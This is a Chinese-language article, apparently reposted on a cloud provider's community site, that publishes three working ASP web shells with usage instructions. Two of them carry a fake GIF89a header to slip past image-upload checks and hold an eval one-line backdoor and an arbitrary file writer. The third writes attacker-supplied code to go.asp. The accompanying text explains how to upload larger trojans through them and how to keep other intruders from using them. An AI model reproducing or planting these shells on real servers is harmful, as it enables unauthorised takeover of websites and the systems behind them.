幾款雙功能免殺超強版asp小馬

來源:互聯網
上載者:User

第一款: 複製代碼 代碼如下:GIF89a$ ;<hTml>
<%eval request(chr(1))%>
<%
on error resume next
testfile=Request.form("filepath")
msg=Request.form("message")
if Trim(request("filepath"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&msg& "")
if err =0 Then
response.write "<font color=red>ok</font>"
else
response.write "<font color=red>no</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<form method="POST" ACTION="">
<input type="text" size="20" name="filepath"
value="<%=server.mappath("go.asp")%>"> <BR>
<TEXTAREA NAME="Message" ROWS="5" COLS="40"></TEXTAREA>
<input type="submit" name="Send" value="go">
</form></body></html></body></html>

第二款: 複製代碼 代碼如下:GIF89a$ ;<hTml>
<%eval request(chr(1))%>
<% if request("action")="kof97" then %>
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="success"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<% end if %>
</body></html>

第三款: 複製代碼 代碼如下:<%set s=server.createObject("Adodb.Stream")%>
<%s.Type=2%>
<%s.Open%>
<%s.CharSet="gb2312"%>
<%s.writetext request("d")%>
<%s.SaveToFile server.mappath("go.asp"),2%>
<%s.Close%>
<%set s=nothing%>
<form>
<textarea name=d cols=80 rows=10 width=32></textarea>
<input type=submit>
</form>

使用說明及介紹:
第一款 功能說明: 用一句話串連進行傳馬 或直接傳馬

GIF89a$ ;<hTml>
--[這裡的意思相信大家都瞭解 意思就是 上傳圖片時起到欺騙的作用.]

<%eval request(chr(1))%>
--[這是就asp一句話木馬 這裡的 chr(1) 就是asp一句話木馬的密碼
那麼實際chr(1)= 所以密碼為 別說你不知知道
重點來了 當你用這個ASP小馬時 你可以用這個asp小馬來裡面的一句話進行傳大馬 然也可以直接用這個傳大馬

這裡的go.asp就是上傳馬的地址了 這個自己可以修改 說的夠詳細吧
第二款:
同上功能就不說了!

<% if request("action")="kof97" then %>
相信懂ASP的一看就明白! 也不多說了
用法是 直接在你小馬地址後面加上 ?action=kof97 給個例子吧
http://www.xxx.com/xxx.asp?action=kof97 kof97這個改成自己的!在小馬里面改
好處就是 當別人直接存取你的小馬時 顯示的是空白 無法使用你的小馬 與要密碼的小馬差不多
第三款:
可以說是除了ASP一句話小馬之外就非它莫屬了! 只有兩百多個位元組

<%s.SaveToFile server.mappath("go.asp"),2%>
當你開啟小馬地址就會自動產生go.asp 修改成自己的
此小馬要與 一句話小馬 或其它小馬 配合使用 當你在在輸入框寫入我們的馬 然後點 提交 會自動產生go.asp 小馬地址
好處就是 當別人直接存取你的小馬時 不管他提交什麼馬 他不知道你設定的那個檔案地址

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.